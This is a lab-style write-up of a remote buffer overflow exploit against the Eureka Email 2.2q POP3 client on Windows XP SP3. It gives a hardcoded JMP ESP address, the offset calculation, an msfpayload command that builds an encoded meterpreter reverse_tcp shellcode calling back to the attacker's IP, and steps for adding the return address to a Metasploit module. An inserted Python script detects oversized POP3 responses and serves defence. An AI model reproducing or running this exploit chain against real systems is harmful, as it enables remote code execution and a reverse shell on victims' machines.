Eureka Email 2.2q ERR Remote Buffer Overflow Exploit

=========================================

victim : Windows XP SP3 (Chinese)

attacker OS : bt5
(ip : 192.168.94.141)

—————————————–

this is the app and the vuln info,
and it did not work against my victim before I modified it

=========================================
[screenshot 01a]


[screenshot 1]

=========================================

the vuln is like this: a direct RET overwrite

client connects to the POP3 server ---> POP3 server replies with a long or specially crafted response ---> app crashes and arbitrary code is executed.
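As an added example (not the post's Perl script), a defender-side check over a captured POP3 server-to-client stream that flags replies beyond the RFC 1939 line limit, which is the condition that triggers the overflow described above. The 710-byte threshold is the RET offset the post reports; the sample stream is constructed.

```python
"""Flag oversized POP3 server responses of the kind that overflow a client
buffer. Added example, not the post's code. RFC 1939 section 3 caps a server
response at 512 octets including the terminating CRLF; the crash in the post
is triggered by a reply far longer than that (RET overwritten after 710 bytes)."""
from dataclasses import dataclass
from typing import List

POP3_MAX_RESPONSE = 512       # RFC 1939 limit, including CRLF
CLIENT_CRASH_THRESHOLD = 710  # RET offset reported in the post (!pvefindaddr suggest)


@dataclass
class Finding:
    line_no: int
    length: int     # octets including CRLF, as the RFC counts them
    severity: str   # "oversized" or "crash-capable"
    preview: str


def check_pop3_responses(stream: bytes) -> List[Finding]:
    """Split a captured server-to-client byte stream on CRLF and report every
    line over the protocol limit, marking those long enough to reach RET."""
    findings: List[Finding] = []
    for idx, raw in enumerate(stream.split(b"\r\n"), start=1):
        if not raw:
            continue
        length = len(raw) + 2
        if length <= POP3_MAX_RESPONSE:
            continue
        severity = "crash-capable" if len(raw) >= CLIENT_CRASH_THRESHOLD else "oversized"
        findings.append(Finding(idx, length, severity, raw[:24].decode("latin-1")))
    return findings


# Constructed sample: a normal greeting, an oversized-but-short reply, and an
# 800-byte reply of the shape the post's malicious server sends.
SAMPLE_STREAM = (
    b"+OK POP3 server ready\r\n"
    + b"+OK " + b"B" * 600 + b"\r\n"
    + b"+OK " + b"A" * 800 + b"\r\n"
)

if __name__ == "__main__":
    for f in check_pop3_responses(SAMPLE_STREAM):
        print(f"line {f.line_no}: {f.length} octets, {f.severity}: {f.preview!r}...")
```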

so, bt5 will be set up as the POP3 server

first, I will jump to ESP and put a jump-back stub at ESP, so I can use the large part of the buffer that sits before the RET overwrite.

and I need the address of a jmp esp; after research, user32.dll is loaded by the app

now, load user32.dll in Immunity Debugger

I think it is the fastest way to find a jmp esp in user32.dll
=========================================
[screenshot 2]

=========================================

Alt+E ---> double click user32.dll

=========================================

[screenshot 3]

=========================================

Ctrl+F ---> jmp esp

and I can see that a jmp esp appears (at the top)

=========================================

[screenshot 4]
=========================================

0x77D29353 JMP ESP

let me remember this address

OK, I was happy that I could already handle it now; different OS versions have different addresses.

go to my perl script and run it

=========================================
[screenshots 5, 6, 7]

=========================================

back to the app:
Options ---> Connection settings ---> POP3 [incoming] (192.168.94.141)

this is my bt5 IP address

OK, Ctrl+M to run the app

=========================================

[screenshot 8]
=========================================

calc.exe appears

that is what I need

now, I will show the following line from my perl script. What is it? Where does it come from?

#######################

my $junk = "A" x (723 - length($localserver)) ;

########################

first, I had to google for an Immunity Debugger plugin: pvefindaddr

after I found it, I put it in c:\Program Files\Immunity Inc\Immunity Debugger\PyCommands

also, I have to create a 5000-byte cyclic pattern to test the vulnerable app

there are two ways:

1. use the pvefindaddr plugin; type a command like "!pvefindaddr pattern_create 5000"

2. use the Metasploit tool; where is it? try "locate pattern_create"

add the pattern to my perl script

=========================================

[screenshot 9]
=========================================

1. run the perl script

2. run the app in Immunity Debugger

3. Ctrl+M

=========================================

[screenshot 10]
=========================================

now, enter the command in Immunity Debugger

"!pvefindaddr suggest"

the following picture tells me everything

=========================================
[screenshot 11]

=========================================

RET is overwritten after 710 bytes. To make the exploit generic, I will use 127.0.0.1, which is 4 bytes shorter than 192.168.94.141, so the offset will be 714 bytes. Finally, calculate the offset from the length of the local server address: 723 - length($localserver).

On the other hand, the calc.exe shellcode is not my target; I want a more powerful shellcode.

meterpreter is what I need.

try this

## bt5 command

msfpayload windows/meterpreter/reverse_tcp lhost=192.168.94.141 R | msfencode -b "0x00" -e "x86/alpha_mixed" -t perl

after it is generated, replace the shellcode in my perl script with it

=========================================
[screenshot 12]

=========================================

see what happens.

=========================================

[screenshot 13]
=========================================

good !!

finally, to make this exploit simpler to use, I will make it part of Metasploit

first, there is already a module for it in Metasploit; what I need to do is add the RET address.

=======================================
[screenshot 14]

=======================================

run Metasploit and the app

=======================================
[screenshots 15, 16]

=======================================

good !!
